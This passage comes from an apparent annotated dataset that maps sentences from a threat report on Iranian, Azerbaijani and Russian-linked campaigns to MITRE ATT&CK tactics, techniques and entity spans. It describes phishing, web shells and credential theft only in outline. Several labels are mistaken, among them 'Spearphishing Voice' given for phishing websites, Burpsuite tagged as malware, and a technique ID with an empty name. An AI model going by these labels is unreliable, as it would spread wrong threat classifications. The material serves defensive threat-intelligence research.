"id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "used fake accounts and fictitious personas to trick targets into clicking phishing links or downloading malicious applications", "entities": [ { "text": "This group", "start": 22, "end": 32, "label": "ThreatActor" }, { "text": "malicious applications", "start": 251, "end": 273, "label": "MalwareTool" }, { "text": "phishing links", "start": 221, "end": 235, "label": "Action" }, { "text": "build trust with potential targets", "start": 154, "end": 188, "label": "Action" }, { "text": "trick them into clicking on phishing links or downloading malicious applications.", "start": 193, "end": 274, "label": "Action" }, { "text": "low-sophistication fake accounts", "start": 55, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "fictitious personas", "start": 107, "end": 126, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-82_mitre_report-p6-s24-912417", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 6, "sentence_id": 24, "context_before": "● Social engineering: This group used a combination of low-sophistication fake accounts and more elaborate fictitious personas, which they likely used to build trust with potential targets and trick them into clicking on phishing links or downloading malicious applications.", "sentence_text": "Some of these personas posed as human rights activists or academics.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "some personas created by the attackers posed as human rights activists or academics", "entities": [ { "text": "personas ", "start": 14, "end": 23, "label": "MalwareTool" }, { "text": "posed as human rights activists or academics", "start": 23, "end": 67, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p6-s26-3edae6", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 6, "sentence_id": 26, "context_before": "● Phishing:", "sentence_text": "This campaign also relied on a network of phishing websites that hosted event landing pages or files where people were asked to login with their Google credentials to register.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "relied on phishing websites that asked users to login with their google credentials", "entities": [ { "text": "network of phishing websites", "start": 31, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "event landing pages", "start": 72, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "asked to login with their Google credentials", "start": 119, "end": 163, "label": "Action" }, { "text": "files", "start": 95, "end": 100, "label": "MalwareTool" } ] }, { "uid": "mitre-82_mitre_report-p6-s28-4708e1", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 6, "sentence_id": 28, "context_before": "● Malware:", "sentence_text": "To compromise people’s accounts and devices, this group copied and modified a legitimate Android application — a birthday calendar app — so it could extract contact information and send it to the attacker’s remote server.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" }, { "id": "T1587.001", "name": "Malware" } ], "procedure": "modified a legitimate Android app so it could steal contact information and send it to their remote server", "entities": [ { "text": "this group", "start": 45, "end": 55, "label": "ThreatActor" }, { "text": "Android application ", "start": 89, "end": 109, "label": "MalwareTool" }, { "text": "birthday calendar app ", "start": 113, "end": 135, "label": "MalwareTool" }, { "text": "attacker’s remote server", "start": 196, "end": 220, "label": "Infrastructure_Indicator" }, { "text": "copied and modified a legitimate Android application ", "start": 56, "end": 109, "label": "Action" }, { "text": "extract contact information", "start": 149, "end": 176, "label": "Action" }, { "text": "send it to the attacker’s remote server", "start": 181, "end": 220, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p6-s29-31f440", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 6, "sentence_id": 29, "context_before": "To compromise people’s accounts and devices, this group copied and modified a legitimate Android application — a birthday calendar app — so it could extract contact information and send it to the attacker’s remote server.", "sentence_text": "We named this previously unreported malware strain HilalRAT (remote access trojan), after seeing “hilal'' in several of the malware samples we analyzed.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "named previously unreported malware strain HilalRAT (remote access trojan)", "entities": [ { "text": "HilalRAT", "start": 51, "end": 59, "label": "MalwareTool" }, { "text": "remote access trojan", "start": 61, "end": 81, "label": "MalwareTool" }, { "text": "malware strain", "start": 36, "end": 50, "label": "MalwareTool" }, { "text": "malware samples", "start": 124, "end": 139, "label": "MalwareTool" } ] }, { "uid": "mitre-82_mitre_report-p6-s30-351b8d", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 6, "sentence_id": 30, "context_before": "We named this previously unreported malware strain HilalRAT (remote access trojan), after seeing “hilal'' in several of the malware samples we analyzed.", "sentence_text": "In the Appendix, we’re also sharing a Yara rule to help the security community identify it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p6-s31-e7e69c", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 6, "sentence_id": 31, "context_before": "In the Appendix, we’re also sharing a Yara rule to help the security community identify it.", "sentence_text": "2. Previously unreported hacking group from Iran We took action against a previously unreported hacking group from Iran that targeted or spoofed companies in multiple industries around the world.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p6-s32-fab526", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 6, "sentence_id": 32, "context_before": "2. Previously unreported hacking group from Iran We took action against a previously unreported hacking group from Iran that targeted or spoofed companies in multiple industries around the world.", "sentence_text": "This activity had the hallmarks of a well-resourced and persistent operation while obfuscating who’s behind it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p6-s33-756171", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 6, "sentence_id": 33, "context_before": "This activity had the hallmarks of a well-resourced and persistent operation while obfuscating who’s behind it.", "sentence_text": "We identified the following TTPs used by this group across the internet:\n● Social engineering:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p6-s34-c21897", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 6, "sentence_id": 34, "context_before": "We identified the following TTPs used by this group across the internet:\n● Social engineering:", "sentence_text": "They often posed as recruiters for real and fake companies in the industry or region that each persona targeted, as part of what ADVERSARIAL THREAT REPORT 6", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "posed as recruiters for real and fake companies to target victims", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "persona ", "start": 95, "end": 103, "label": "MalwareTool" }, { "text": "posed as recruiters", "start": 11, "end": 30, "label": "Action" }, { "text": "targeted,", "start": 103, "end": 112, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p7-s35-510d39", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 7, "sentence_id": 35, "context_before": "They often posed as recruiters for real and fake companies in the industry or region that each persona targeted, as part of what ADVERSARIAL THREAT REPORT 6", "sentence_text": "appeared to be a social engineering scheme to trick people into clicking on malicious links or installing malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "used a social engineering scheme to trick people into clicking malicious links or installing malware", "entities": [ { "text": "trick people", "start": 46, "end": 58, "label": "Action" }, { "text": "clicking on malicious links", "start": 64, "end": 91, "label": "Action" }, { "text": "installing malware", "start": 95, "end": 113, "label": "Action" }, { "text": "malware", "start": 106, "end": 113, "label": "MalwareTool" }, { "text": "malicious links", "start": 76, "end": 91, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-82_mitre_report-p7-s36-e9007c", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 7, "sentence_id": 36, "context_before": "appeared to be a social engineering scheme to trick people into clicking on malicious links or installing malware.", "sentence_text": "● Fake and spoofed legitimate corporate websites: This operation included a network of fictitious corporate recruiting websites, as well as spoofed domains of legitimate companies.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "used fictitious corporate recruiting websites and spoofed domains of legitimate companies", "entities": [ { "text": "network of fictitious corporate recruiting websites", "start": 76, "end": 127, "label": "Infrastructure_Indicator" }, { "text": "spoofed domains of legitimate companies", "start": 140, "end": 179, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-82_mitre_report-p7-s37-56a77b", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 7, "sentence_id": 37, "context_before": "● Fake and spoofed legitimate corporate websites: This operation included a network of fictitious corporate recruiting websites, as well as spoofed domains of legitimate companies.", "sentence_text": "It also relied heavily on email phishing to social engineer people to download malware, likely in an attempt to gain information and access to corporate systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "relied on email phishing to trick people into downloading malware to gain information and access corporate systems", "entities": [ { "text": "malware", "start": 79, "end": 86, "label": "MalwareTool" }, { "text": "email phishing", "start": 26, "end": 40, "label": "Action" }, { "text": "social engineer people to download malware", "start": 44, "end": 86, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p7-s38-212ed4", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 7, "sentence_id": 38, "context_before": "It also relied heavily on email phishing to social engineer people to download malware, likely in an attempt to gain information and access to corporate systems.", "sentence_text": "● Interactive targeting and exploit protection: This group took steps to conceal their activity and protect their malicious tools by embedding interactive features in them that would only send the malicious payload after the targets interacted with the attacker in real time.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027.006", "name": "HTML Smuggling" } ], "procedure": "embedded interactive features in tools that only sent the payload after targets interacted with the attacker in real time", "entities": [ { "text": "malicious tools", "start": 114, "end": 129, "label": "MalwareTool" }, { "text": "This group", "start": 48, "end": 58, "label": "ThreatActor" }, { "text": "malicious payload", "start": 197, "end": 214, "label": "MalwareTool" }, { "text": "conceal their activity", "start": 73, "end": 95, "label": "Action" }, { "text": "protect their malicious tools", "start": 100, "end": 129, "label": "Action" }, { "text": "embedding interactive features", "start": 133, "end": 163, "label": "Action" }, { "text": "send the malicious payload", "start": 188, "end": 214, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p7-s39-2fedb8", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 7, "sentence_id": 39, "context_before": "● Interactive targeting and exploit protection: This group took steps to conceal their activity and protect their malicious tools by embedding interactive features in them that would only send the malicious payload after the targets interacted with the attacker in real time.", "sentence_text": "For example, an interview app would launch a built-in chat function for an attacker to supply a password to start an interview.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1207.006", "name": "" } ], "procedure": "attacker supplies a password using a built in chat function to start the interview (initiate execution)", "entities": [ { "text": "attacker", "start": 75, "end": 83, "label": "ThreatActor" }, { "text": "interview app", "start": 16, "end": 29, "label": "MalwareTool" }, { "text": "built-in chat function", "start": 45, "end": 67, "label": "MalwareTool" }, { "text": "launch a built-in chat function", "start": 36, "end": 67, "label": "Action" }, { "text": "supply a password to start an interview", "start": 87, "end": 126, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p7-s40-789d1a", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 7, "sentence_id": 40, "context_before": "For example, an interview app would launch a built-in chat function for an attacker to supply a password to start an interview.", "sentence_text": "When the target entered the password, it activated the delivery of the malware.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027.006", "name": "HTML Smuggling" } ], "procedure": "malware delivery was activated by the target entering a password", "entities": [ { "text": "malware", "start": 71, "end": 78, "label": "MalwareTool" }, { "text": "activated the delivery of the malware", "start": 41, "end": 78, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p7-s42-6ad59a", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 7, "sentence_id": 42, "context_before": "● Malware:", "sentence_text": "A hybrid operation from Azerbaijan We disrupted a complex network in Azerbaijan that engaged in both cyber espionage and coordinated inauthentic behavior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p7-s43-152eab", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 7, "sentence_id": 43, "context_before": "A hybrid operation from Azerbaijan We disrupted a complex network in Azerbaijan that engaged in both cyber espionage and coordinated inauthentic behavior.", "sentence_text": "This campaign was prolific but low in sophistication, and was run by the Azeri Ministry of Internal Affairs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p7-s44-caf711", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 7, "sentence_id": 44, "context_before": "This campaign was prolific but low in sophistication, and was run by the Azeri Ministry of Internal Affairs.", "sentence_text": "It combined a range of tactics — from phishing, social engineering, and hacking to coordinated inauthentic behavior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p8-s45-a44156", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 45, "context_before": "It combined a range of tactics — from phishing, social engineering, and hacking to coordinated inauthentic behavior.", "sentence_text": "We identified the following tactics, techniques, and procedures (TTPs) used by this threat actor across the internet:\n● Compromised and spoofed websites: This group operated across the internet, with over 70 websites and domains that they either ran themselves or compromised.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "group ran or compromised over 70 websites and domain across the internet", "entities": [ { "text": "This group ", "start": 154, "end": 165, "label": "ThreatActor" }, { "text": "websites", "start": 208, "end": 216, "label": "Infrastructure_Indicator" }, { "text": "domains ", "start": 221, "end": 229, "label": "Infrastructure_Indicator" }, { "text": "Compromised and spoofed websites", "start": 120, "end": 152, "label": "Infrastructure_Indicator" }, { "text": "operated across the internet", "start": 165, "end": 193, "label": "Action" }, { "text": "ran themselves or compromised", "start": 246, "end": 275, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p8-s46-01b7df", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 46, "context_before": "We identified the following tactics, techniques, and procedures (TTPs) used by this threat actor across the internet:\n● Compromised and spoofed websites: This group operated across the internet, with over 70 websites and domains that they either ran themselves or compromised.", "sentence_text": "Once they compromised these websites, the group harvested databases containing usernames and passwords, likely to further compromise online accounts of their targets who might have reused the same credentials across the internet.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.001", "name": "Credentials In Files" } ], "procedure": "harvested databases with usernames and passwords after compromising the websites", "entities": [ { "text": "the group", "start": 38, "end": 47, "label": "ThreatActor" }, { "text": "these websites", "start": 22, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "compromised these websites", "start": 10, "end": 36, "label": "Action" }, { "text": "harvested databases containing usernames and passwords", "start": 48, "end": 102, "label": "Action" }, { "text": "compromise online accounts", "start": 122, "end": 148, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p8-s47-492d33", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 47, "context_before": "Once they compromised these websites, the group harvested databases containing usernames and passwords, likely to further compromise online accounts of their targets who might have reused the same credentials across the internet.", "sentence_text": "They also, at times, hosted credential phishing content on these websites.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566.004", "name": "Spearphishing Voice" } ], "procedure": "hosted credential phishing content on websites", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "these websites", "start": 59, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "hosted credential phishing content on these websites", "start": 21, "end": 73, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p8-s48-4a29bc", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 48, "context_before": "They also, at times, hosted credential phishing content on these websites.", "sentence_text": "● Malware and other malicious tools: This group scanned websites in the region for “low-hanging fruit” web vulnerabilities, using tools like Burpsuite and Netsparker.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1595.002", "name": "Vulnerability Scanning" } ], "procedure": "scanned regional websites for vulnerabilities using Burpsuite and netsparker", "entities": [ { "text": "This group", "start": 37, "end": 47, "label": "ThreatActor" }, { "text": "Burpsuite", "start": 141, "end": 150, "label": "MalwareTool" }, { "text": "Netsparker", "start": 155, "end": 165, "label": "MalwareTool" }, { "text": "websites in the region", "start": 56, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "scanned websites in the region for “low-hanging fruit” web vulnerabilities", "start": 48, "end": 122, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p8-s49-64da2d", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 49, "context_before": "● Malware and other malicious tools: This group scanned websites in the region for “low-hanging fruit” web vulnerabilities, using tools like Burpsuite and Netsparker.", "sentence_text": "They then used publicly known techniques to compromise vulnerable sites before uploading one of numerous web shells in order to maintain persistent access.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "used publicly known techniques to compromise sites, upload web shells, and maintained persistent access", "entities": [ { "text": "They ", "start": 0, "end": 5, "label": "ThreatActor" }, { "text": "web shells ", "start": 105, "end": 116, "label": "MalwareTool" }, { "text": "vulnerable sites", "start": 55, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "used publicly known techniques", "start": 10, "end": 40, "label": "Action" }, { "text": "compromise vulnerable sites", "start": 44, "end": 71, "label": "Action" }, { "text": "uploading one of numerous web shells i", "start": 79, "end": 117, "label": "Action" }, { "text": "maintain persistent access", "start": 128, "end": 154, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p8-s50-4ed87d", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 50, "context_before": "They then used publicly known techniques to compromise vulnerable sites before uploading one of numerous web shells in order to maintain persistent access.", "sentence_text": "Similarly, to crack hashes obtained from compromised sites, they used publicly available hash-cracking tools.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.002", "name": "Password Cracking" } ], "procedure": "used publicly available hash-cracking tools to crack hashes from compromised sites", "entities": [ { "text": "they", "start": 60, "end": 64, "label": "ThreatActor" }, { "text": "publicly available hash-cracking tools", "start": 70, "end": 108, "label": "MalwareTool" }, { "text": "compromised sites,", "start": 41, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "crack hashes obtained from compromised sites", "start": 14, "end": 58, "label": "Action" }, { "text": "used publicly available hash-cracking tools", "start": 65, "end": 108, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p8-s51-cba89d", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 51, "context_before": "Similarly, to crack hashes obtained from compromised sites, they used publicly available hash-cracking tools.", "sentence_text": "In its targeting of people, this threat actor is known to use both Windows and commodity surveillanceware for Android.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "used Windows and commodiity surveillanceware for Android when targeting people", "entities": [ { "text": "this threat actor", "start": 28, "end": 45, "label": "ThreatActor" }, { "text": "Windows", "start": 67, "end": 74, "label": "MalwareTool" }, { "text": "commodity surveillanceware for Android", "start": 79, "end": 117, "label": "MalwareTool" }, { "text": "targeting of people", "start": 7, "end": 26, "label": "Action" }, { "text": "use both Windows and commodity surveillanceware for Android", "start": 58, "end": 117, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p8-s52-fc929d", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 52, "context_before": "In its targeting of people, this threat actor is known to use both Windows and commodity surveillanceware for Android.", "sentence_text": "● Credential phishing: In its phishing activity, this group relied on compromised and spoofed websites where they asked people to enter their social media credentials so they could cast their vote in political polls.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566.004", "name": "Spearphishing Voice" } ], "procedure": "used fake websites to phish for social media credentials", "entities": [ { "text": "this group ", "start": 49, "end": 60, "label": "ThreatActor" }, { "text": "compromised and spoofed websites", "start": 70, "end": 102, "label": "Infrastructure_Indicator" }, { "text": "phishing activity", "start": 30, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "relied on compromised and spoofed websites", "start": 60, "end": 102, "label": "Infrastructure_Indicator" }, { "text": "asked people to enter their social media credentials", "start": 114, "end": 166, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-82_mitre_report-p8-s53-f016f8", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 53, "context_before": "● Credential phishing: In its phishing activity, this group relied on compromised and spoofed websites where they asked people to enter their social media credentials so they could cast their vote in political polls.", "sentence_text": "Through it, an attacker would obtain people’s credentials to take over their online accounts.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "obtain credentials to take over online accounts", "entities": [ { "text": "an attacker ", "start": 12, "end": 24, "label": "ThreatActor" }, { "text": "obtain people’s credentials", "start": 30, "end": 57, "label": "Action" }, { "text": "take over their online accounts", "start": 61, "end": 92, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p8-s54-4bfb62", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 54, "context_before": "Through it, an attacker would obtain people’s credentials to take over their online accounts.", "sentence_text": "This operation also attempted to drive people to their phishing web pages by sharing links to them on social media, including through compromised accounts of public figures or accounts posing as members of Facebook’s security team, many of which were detected and disabled by our automated systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "shared links to phishing web pages on social media using compromised accounts and accounts posing as members of the security team", "entities": [ { "text": "phishing web pages", "start": 55, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "social media", "start": 102, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "attempted to drive people to their phishing web pages", "start": 20, "end": 73, "label": "Action" }, { "text": "compromised accounts of public figures", "start": 134, "end": 172, "label": "Action" }, { "text": "posing as members of Facebook’s security team", "start": 185, "end": 230, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p8-s55-50aa2d", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 55, "context_before": "This operation also attempted to drive people to their phishing web pages by sharing links to them on social media, including through compromised accounts of public figures or accounts posing as members of Facebook’s security team, many of which were detected and disabled by our automated systems.", "sentence_text": "● Industry reporting: Our findings corroborate previous public reporting about some of this activity by OC-Media and Qurium.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p8-s56-8af457", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 56, "context_before": "● Industry reporting: Our findings corroborate previous public reporting about some of this activity by OC-Media and Qurium.", "sentence_text": "● Coordinated Inauthentic Behavior: The individuals behind this activity used fake and compromised accounts to run Pages and post as if they were the legitimate owners of these Pages and accounts.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "used fake and compromised accounts to run pages and post as if they were the legitimate owners", "entities": [ { "text": "individuals behind this activity", "start": 40, "end": 72, "label": "ThreatActor" }, { "text": "fake and compromised accounts ", "start": 78, "end": 108, "label": "MalwareTool" }, { "text": "Pages and accounts.", "start": 177, "end": 196, "label": "Infrastructure_Indicator" }, { "text": "run Pages", "start": 111, "end": 120, "label": "Action" }, { "text": "post as if they were the legitimate owners of these Pages and accounts", "start": 125, "end": 195, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p8-s57-19a05f", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 8, "sentence_id": 57, "context_before": "● Coordinated Inauthentic Behavior: The individuals behind this activity used fake and compromised accounts to run Pages and post as if they were the legitimate owners of these Pages and accounts.", "sentence_text": "ADVERSARIAL THREAT REPORT 8", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p9-s58-d27b24", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 9, "sentence_id": 58, "context_before": "ADVERSARIAL THREAT REPORT 8", "sentence_text": "You can find our previous security update on Ukraine here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p9-s59-fc0b17", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 9, "sentence_id": 59, "context_before": "You can find our previous security update on Ukraine here.", "sentence_text": "Our Key Findings Nation state actors Government-linked actors from Russia and Belarus engaged in cyber espionage and covert influence operations online.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p9-s60-ca4932", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 9, "sentence_id": 60, "context_before": "Our Key Findings Nation state actors Government-linked actors from Russia and Belarus engaged in cyber espionage and covert influence operations online.", "sentence_text": "These operations appear to have intensified shortly before the Russian invasion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p9-s61-1a6e37", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 9, "sentence_id": 61, "context_before": "These operations appear to have intensified shortly before the Russian invasion.", "sentence_text": "Prior to that, this particular threat actor primarily focused on accusing Poland of mistreating migrants from the Middle East.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p9-s62-6b0d42", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 9, "sentence_id": 62, "context_before": "Prior to that, this particular threat actor primarily focused on accusing Poland of mistreating migrants from the Middle East.", "sentence_text": "On March 14, they pivoted back to Poland and created an event in Warsaw calling for a protest against the Polish government.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1585.001", "name": "Social Media Accounts" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "created a protest event in warsaw as a part of influence operations", "entities": [ { "text": "they", "start": 13, "end": 17, "label": "ThreatActor" }, { "text": "pivoted back to Poland", "start": 18, "end": 40, "label": "Action" }, { "text": "created an event in Warsaw calling for a protest against the Polish government", "start": 45, "end": 123, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p9-s63-612eb0", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 9, "sentence_id": 63, "context_before": "On March 14, they pivoted back to Poland and created an event in Warsaw calling for a protest against the Polish government.", "sentence_text": "We disabled the account and event that same day.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p9-s64-d2d20a", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 9, "sentence_id": 64, "context_before": "We disabled the account and event that same day.", "sentence_text": "ADVERSARIAL THREAT REPORT 9", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p10-s65-f60e18", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 65, "context_before": "ADVERSARIAL THREAT REPORT 9", "sentence_text": "As we’ve shared before, Ghostwriter typically targets people through internet.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1598", "name": "Phishing for Information" } ], "procedure": "ghostwriter targets people through the internet", "entities": [ { "text": "Ghostwriter ", "start": 24, "end": 36, "label": "ThreatActor" }, { "text": "internet", "start": 69, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "targets people through internet", "start": 46, "end": 77, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p10-s66-bae2a0", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 66, "context_before": "As we’ve shared before, Ghostwriter typically targets people through internet.", "sentence_text": "Since our last public update, this group has attempted to hack into the Facebook accounts of dozens of Ukrainian military personnel.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Threat actor attempted to gain unauthorized access to Facebook accounts belonging to Ukrainian military personnel.", "entities": [ { "text": "attempted to hack into the Facebook accounts of dozens of Ukrainian military personnel", "start": 45, "end": 131, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p10-s67-4825dc", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 67, "context_before": "Since our last public update, this group has attempted to hack into the Facebook accounts of dozens of Ukrainian military personnel.", "sentence_text": "In a handful of cases, they posted videos calling on the Army to surrender as if these posts were coming from the legitimate account owners.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p10-s68-e370d3", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 68, "context_before": "In a handful of cases, they posted videos calling on the Army to surrender as if these posts were coming from the legitimate account owners.", "sentence_text": "We blocked these videos from being shared.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p10-s69-442944", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 10, "sentence_id": 69, "context_before": "We blocked these videos from being shared.", "sentence_text": "Second, we detected and took down an attempt to come back by a network we removed in December 2020 and linked to individuals associated with past activity by the Russian Internet Research Agency (IRA).", "relevant": "no", "tactic": null, "techniques": null, 